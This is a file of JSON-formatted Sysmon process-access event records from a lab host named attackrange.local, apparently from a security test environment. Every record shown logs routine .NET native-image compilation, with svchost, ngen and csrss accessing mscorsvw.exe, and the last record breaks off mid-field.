{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001047640E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001047640E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.730\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-0010AE3D0D00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.730","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-0010AE3D0D00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.730\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-0010AE3D0D00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.730","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-0010AE3D0D00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.746\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001040670E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.746","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001040670E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.777\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010E26A0E00}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.777","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010E26A0E00}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010E26A0E00}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010E26A0E00}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010E26A0E00}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010E26A0E00}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.824\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001009EF0C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 